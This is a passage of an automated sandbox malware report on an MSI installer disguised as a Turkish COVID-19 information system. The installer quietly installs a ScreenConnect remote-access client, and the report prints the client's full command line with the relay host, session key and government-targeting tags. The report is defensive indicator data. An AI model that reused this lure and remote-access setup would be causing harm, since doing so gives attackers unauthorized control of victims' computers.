                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E390325_2_00E39032
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3A8115_2_00E3A811
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E395A45_2_00E395A4
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E38AC05_2_00E38AC0
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F176_2_00007FFAEEF90F17
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF95D656_2_00007FFAEEF95D65
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F836_2_00007FFAEEF90F83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F926_2_00007FFAEEF90F92
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA0A836_2_00007FFAEEFA0A83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA09A36_2_00007FFAEEFA09A3
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF960517_2_00007FFAEEF96051
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F177_2_00007FFAEEF90F17
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F837_2_00007FFAEEF90F83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F927_2_00007FFAEEF90F92
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenameSfxCA.dllL vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenamewixca.dll\ vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: 5.2.ScreenConnect.ClientService.exe.38b0000.5.unpack, ScreenConnect/BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.30b0000.3.unpack, ScreenConnect/BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: classification engineClassification label: mal60.spyw.evad.winMSI@24/15@2/3
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2476:120:WilError_01
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmpJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCommand line argument: GetServiceName5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCommand line argument: Service5_2_00E31880
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - Root\CIMV2 : select * from Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 63.77%
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi'
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c='
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'Jump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiStatic file information: File size 1892352 > 1048576
                      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.461665462.0000000000E3E000.00000002.00020000.sdmp
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0xCD682783 [Thu Mar 16 01:18:59 2079 UTC]
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,5_2_00E31160
                      Source: MSIDAF2.tmp.0.drStatic PE information: real checksum: 0x2f213 should be: 0x66bd6
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E326D5 push ecx; ret 5_2_00E326E8
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_041139A7 push es; retn 0006h5_2_04113AFF
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA0768 push es; retn 6002h6_2_00007FFAEEFDBDC5
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF95DE8 push ebx; retn 5F5Eh6_2_00007FFAEEF9801A
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF979DE push eax; retf 6_2_00007FFAEEF979ED
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF97935 pushad ; retf 6_2_00007FFAEEF979DD
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF95DE8 push ebx; retn 5F5Eh7_2_00007FFAEEF9801A
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF979DE push eax; retf 7_2_00007FFAEEF979ED
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF97935 pushad ; retf 7_2_00007FFAEEF979DD
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3239D RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00E3239D
                      Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
